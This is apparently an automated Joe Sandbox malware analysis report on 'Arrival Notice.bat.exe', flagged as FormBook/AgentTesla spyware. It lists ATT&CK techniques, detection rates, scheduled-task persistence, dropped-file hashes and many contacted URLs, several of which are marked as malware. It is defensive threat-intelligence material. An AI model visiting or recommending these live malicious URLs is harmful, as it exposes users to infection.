              | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | 113 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
              | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 4 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
              | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 22 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
              | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Timestomp | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
              | IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 DLL Side-Loading | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement |
              [Figure: Behavior Graph. ID: 1459718, Sample: Arrival Notice.bat.exe, Start date: 19/06/2024, Architecture: WINDOWS, Score: 100]

              | Source | Detection | Scanner | Label | Link |
              |---|---|---|---|---|
              | Arrival Notice.bat.exe | 26% | ReversingLabs | | |
              | Arrival Notice.bat.exe | 100% | Joe Sandbox ML | | |

              | Source | Detection | Scanner | Label | Link |
              |---|---|---|---|---|
              | C:\Users\user\AppData\Roaming\dLrZsz.exe | 100% | Joe Sandbox ML | | |
              | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exe | 100% | Joe Sandbox ML | | |
              | C:\Users\user\AppData\Local\Temp\-6qxw.exe | 100% | Joe Sandbox ML | | |
              | C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exe | 62% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | |
              | C:\Users\user\AppData\Local\Temp\-6qxw.exe | 62% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla | |
              | C:\Users\user\AppData\Roaming\dLrZsz.exe | 26% | ReversingLabs | | |
              No Antivirus matches
              No Antivirus matches
              http://www.grecanici.com/4iea/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=LPPTutp79E4NI/FSO4tKhhCSj88LXvNdsgpq5qffN1EY6wk4NmMiGrfPgNjCGewOe8/3zUEWliAlmzRgBncp+x+MZNm8bqFqjUBXzLeJ0h1+xCuEpOdbPDQ=0%Avira URL Cloudsafe
              https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe
              http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.100%Avira URL Cloudmalware
              http://www.sakkal.comx60%Avira URL Cloudsafe
              https://niteothemes.com0%Avira URL Cloudsafe
              http://www.futuregainers.net/l4k7/0%Avira URL Cloudsafe
              http://push.zhanzhang.baidu.com/push.js0%Avira URL Cloudsafe
              https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
              http://www.shopnow321.online/41br/0%Avira URL Cloudsafe
              http://www.qmancha.com/3in6/?gheP1DX=Beo4F/wq8RdFDjebPnHj1X0mxngmjMMrNdTrW7vwt6cBBJ1fMwEGjCkFOHv2gXsTpd06O+ghlGNN6L13Yf+5YaxQqqrS/i2qyCLFr7bAJDv3UDERmc5Em7s=&QTth=cdSXMBmhjDz0%Avira URL Cloudsafe
              http://www.93v0.com/hcaw/0%Avira URL Cloudsafe
              https://www.googleoptimize.com0%Avira URL Cloudsafe
              http://www.zonenail.info/kscn/?gheP1DX=CaZls2vsCC5SEDZO9v0TsRD/xR3TWESK018fdyQAavLwN8o4xbvFproXKVSs0R5JJuiJmc+bWHrVqZCkdQKET8aXg+bTbKyQsViJTM4/a4CXWVNH2Hn1tMo=&QTth=cdSXMBmhjDz0%Avira URL Cloudsafe
              https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
              https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
              https://youtu.be/uO1hXLmT2j40%Avira URL Cloudsafe
              http://klimkina.pro/4mpz/?tF1tk6=Y0%Avira URL Cloudsafe
              https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
              http://www.klimkina.pro/4mpz/?tF1tk6=Y+s3rA3a2LtNoPwXEph1agZvu5GuOlYPKC2uuWvM7lg96Y/Bosg4gpfl0qSHVI44Bh+XBT77oF2RMn9kUx4Voi3TiJN+9DCYn4mYX0I3YWd5veeVZiJYYCE=&8FiTp=kJrtnVsPEnF0JV0%Avira URL Cloudsafe
              http://www.zonenail.info0%Avira URL Cloudsafe
              http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2100%Avira URL Cloudmalware
              http://www.futuregainers.net/l4k7/?tF1tk6=afjyNtLybwItDht4A4I53iDRENSS8jmKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+QktvoJK9v8ttAQP4wg2bLqAZCOth8+1YyfQ=&8FiTp=kJrtnVsPEnF0JV0%Avira URL Cloudsafe
              https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
              https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpg100%Avira URL Cloudmalware
              http://www.litespeedtech.com/error-page0%Avira URL Cloudsafe
              https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
              https://wordpress.org/plugins/cmp-coming-soon-maintenance/0%Avira URL Cloudsafe
              https://zz.bdstatic.com/linksubmit/push.js0%Avira URL Cloudsafe
              http://www.qmancha.com/3in6/0%Avira URL Cloudsafe
              https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
              http://www.klimkina.pro/4mpz/0%Avira URL Cloudsafe
              https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
              http://www.93v0.com/hcaw/?8FiTp=kJrtnVsPEnF0JV&tF1tk6=Xa5/huFy8Eck4v8fb+wyxg1DlrWOKGB/lHr4KuxbDQUg1IaZpZOFGkNm4jxFFpbvuuzZpNiUUgQ/swG1ojXNoV7by9A8iCGRjPSG14/ArJMw+NsbE1irimM=0%Avira URL Cloudsafe
              https://w.ladicdn.com/v2/source/html5shiv.min.js?v=15693102226930%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pacompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designersGArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://optimize.google.comcompact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/?Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.founder.com.cn/cn/bTheArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/themes/countdown/style.css?v=4.1.compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    http://www.fontbureau.com/designers?Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.sakkal.comx6Arrival Notice.bat.exe, 00000000.00000002.1732258181.0000000006180000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://niteothemes.comcompact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.tiro.comArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://push.zhanzhang.baidu.com/push.jscompact.exe, 00000012.00000002.4147635781.00000000042F4000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004384000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://static.loopia.se/responsive/images/iOS-72.pngcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.goodfont.co.krArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.typography.netDArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://www.googleoptimize.comcompact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.galapagosdesign.com/staff/dennis.htmArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://static.loopia.se/shared/logo/logo-loopia-white.svgcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwecompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://youtu.be/uO1hXLmT2j4compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://klimkina.pro/4mpz/?tF1tk6=Ycompact.exe, 00000012.00000002.4147635781.0000000003B1A000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003BAA000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.zonenail.infoWRrRgOfpwFEFXfaWUCsdTxK.exe, 0000001B.00000002.4147461137.000000000500C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchcompact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.fonts.comArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.sandoll.co.krArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://shahaf3d.com/wp-content/plugins/cmp-coming-soon-maintenance/js/external/vidim.min.js?v=1.0.2compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    http://www.sakkal.comArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://static.loopia.se/shared/style/2022-extra-pages.csscompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.apache.org/licenses/LICENSE-2.0Arrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.fontbureau.comArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://shahaf3d.com/wp-content/uploads/2023/08/shahaf-3d-concrete-printing.jpgWRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: malware
                                                                    unknown
                                                                    https://static.loopia.se/responsive/images/iOS-114.pngcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.litespeedtech.com/error-pagecompact.exe, 00000012.00000002.4147635781.0000000004486000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004516000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://wordpress.org/plugins/cmp-coming-soon-maintenance/compact.exe, 00000012.00000002.4147635781.0000000003CAC000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003D3C000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://zz.bdstatic.com/linksubmit/push.jscompact.exe, 00000012.00000002.4147635781.00000000042F4000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000004384000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://static.loopia.se/responsive/styles/reset.csscompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://ac.ecosia.org/autocomplete?q=compact.exe, 00000012.00000002.4150230985.00000000077E8000.00000004.00000020.00020000.00000000.sdmp, runonce.exe, 0000001A.00000002.4149715750.0000000007B68000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://static.loopia.se/responsive/images/iOS-57.pngcompact.exe, 00000012.00000002.4147635781.00000000047AA000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.000000000483A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://www.fontbureau.com/designers/cabarga.htmlNArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    http://www.founder.com.cn/cnArrival Notice.bat.exe, 00000000.00000002.1733463080.00000000079B2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693compact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, compact.exe, 00000012.00000002.4149982280.0000000005CF0000.00000004.00000800.00020000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://td.doubleclick.netcompact.exe, 00000012.00000002.4147635781.0000000003E3E000.00000004.10000000.00040000.00000000.sdmp, WRrRgOfpwFEFXfaWUCsdTxK.exe, 00000013.00000002.4145794354.0000000003ECE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                    • URL Reputation: safe
                                                                    unknown
                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                    Joe Sandbox version:40.0.0 Tourmaline
                                                                    Analysis ID:1459718
                                                                    Start date and time:2024-06-19 22:37:05 +02:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 12m 23s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:25
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:4
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:Arrival Notice.bat.exe
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winEXE@33/20@22/16
                                                                    EGA Information:
                                                                    • Successful, ratio: 80%
                                                                    HCA Information:
                                                                    • Successful, ratio: 88%
                                                                    • Number of executed functions: 72
                                                                    • Number of non-executed functions: 288
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .exe
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                    • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Not all processes were analyzed, report is missing behavior information
                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                    • VT rate limit hit for: Arrival Notice.bat.exe
                                                                    Time      Type             Description
                                                                    16:37:57  API Interceptor  16x Sleep call for process: Arrival Notice.bat.exe modified
                                                                    16:37:59  API Interceptor  38x Sleep call for process: powershell.exe modified
                                                                    16:38:03  API Interceptor  12x Sleep call for process: dLrZsz.exe modified
                                                                    16:39:05  API Interceptor  10493996x Sleep call for process: compact.exe modified
                                                                    16:40:18  API Interceptor  1x Sleep call for process: -6qxw.exe modified
                                                                    16:41:31  API Interceptor  108231x Sleep call for process: runonce.exe modified
                                                                    21:37:59  Task Scheduler   Run new task: dLrZsz path: C:\Users\user\AppData\Roaming\dLrZsz.exe
                                                                    Match:C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\OdR8akYyHwr3ISR[1].exe
                                                                    • Associated Sample Name: Arrival Notice.bat.exe, Detection: malicious, Threat Name: FormBook
                                                                    • Associated Sample Name: AWB_NO_907853880911.exe, Detection: malicious, Threat Name: FormBook
                                                                    Match:C:\Users\user\AppData\Local\Temp\-6qxw.exe
                                                                    • Associated Sample Name: Arrival Notice.bat.exe, Detection: malicious, Threat Name: FormBook
                                                                    • Associated Sample Name: AWB_NO_907853880911.exe, Detection: malicious, Threat Name: FormBook
                                                                            Process:C:\Users\user\AppData\Local\Temp\-6qxw.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1216
                                                                            Entropy (8bit):5.34331486778365
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                            Malicious:false
                                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                            Process:C:\Users\user\Desktop\Arrival Notice.bat.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1301
                                                                            Entropy (8bit):5.334025345208678
                                                                            Encrypted:false
                                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4VE4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HT
                                                                            MD5:C8D49A85A61847AAE0536AE8856F6DEC
                                                                            SHA1:D4121C87789F6AE40FCB9B4F896BC2A0C79182AD
                                                                            SHA-256:3F7809C712D948FF3404AE242044B5463E60BCDCE93121886F8CB36799D4E3CE
                                                                            SHA-512:FFD3460D5B6F00C49D7A91B299765BB7620B440718DACA711566C41A0C153F51E936EE479F4B9E002794EF2E0EBFFCED32ACE15CF9C7A892248EFA6A42468D51
                                                                            Malicious:true
